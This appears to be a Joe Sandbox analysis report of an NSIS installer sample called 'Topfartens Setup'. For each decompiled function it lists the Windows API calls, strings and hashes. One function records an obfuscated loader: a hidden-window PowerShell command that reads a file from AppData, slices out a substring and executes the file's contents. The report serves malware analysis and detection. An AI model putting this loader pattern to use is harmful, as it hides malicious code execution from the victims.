SetBkMode.GDI32(?,?), ref: 00404119
GetSysColor.USER32(?), ref: 0040412C
SetBkColor.GDI32(?,?), ref: 0040413C
DeleteObject.GDI32(?), ref: 00404156
CreateBrushIndirect.GDI32(?), ref: 00404160

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54

Function 00404992 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
GetMessagePos.USER32 ref: 004049B5
ScreenToClient.USER32(?,?), ref: 004049CF
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07

Strings

f, xrefs: 004049E3

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4

Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
MulDiv.KERNEL32(00019800,00000064,000E6160), ref: 00402CC2
wsprintfA.USER32 ref: 00402CD2
SetWindowTextA.USER32(?,?), ref: 00402CE2
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4

Strings

verifying installer: %d%%, xrefs: 00402CCC

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58

Function 0040558D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
GetLastError.KERNEL32 ref: 004055E4
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
GetLastError.KERNEL32 ref: 00405603

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3
C:\Users\user\Desktop, xrefs: 0040558D

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2028306314
Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9

Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
GlobalFree.KERNEL32(?), ref: 004027EB
GlobalFree.KERNEL32(00000000), ref: 004027FE
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
Opcode Fuzzy Hash: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8

Function 00404888 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Topfartens Setup: Installing,Topfartens Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
wsprintfA.USER32 ref: 0040492E
SetDlgItemTextA.USER32(?,Topfartens Setup: Installing), ref: 00404941

Strings

%u.%u%s%s, xrefs: 00404910
Topfartens Setup: Installing, xrefs: 00404918, 0040491D, 00404923, 00404937

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Topfartens Setup: Installing
API String ID: 3540041739-550604392
Opcode ID: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
Opcode Fuzzy Hash: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9

Function 00402003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E

Part of subcall function 004050C7: lstrlenA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",004030F7,004030F7,Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",00000000,004195D8,74DF23A0), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ",Execute: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8

Strings

powershell.exe -windowstyle hidden, xrefs: 00402082

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: powershell.exe -windowstyle hidden
API String ID: 2987980305-1683101720
Opcode ID: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
Opcode Fuzzy Hash: abecd26dfb3de0ce52c950ba2215734ba3e8e38533135c2a8ac1c574d6d38cf5
Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E

Function 00401D9B Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D9E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
ReleaseDC.USER32(?,00000000), ref: 00401DD1
CreateFontIndirectA.GDI32(0040B818), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
Opcode Fuzzy Hash: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D45
GetClientRect.USER32(00000000,?), ref: 00401D52
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
DeleteObject.GDI32(00000000), ref: 00401D90

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
Opcode Fuzzy Hash: 44377fec807def88e2ae6330315822b4c14167ae81f11e6d4f0decf461b48cd2
Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28

Function 00405938 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405947
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405938

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE

Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
Instruction ID: bf26dd322600c86e705ae03821e5e95be148f4b98a6ddde11b8b46473537de7c
Opcode Fuzzy Hash: 36a723ba0b9fe6841f0d996bf234943a63eacbada2c77057d577eaa1ff2cf2a2
Instruction Fuzzy Hash: 0E115832504109FBEF129F90CF09F9E7B69AB08380F104076BD45B51E0EBB59E11AAA8

Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
GetTickCount.KERNEL32 ref: 00402D30
CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
ShowWindow.USER32(00000000,00000005), ref: 00402D5B

Memory Dump Source

Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
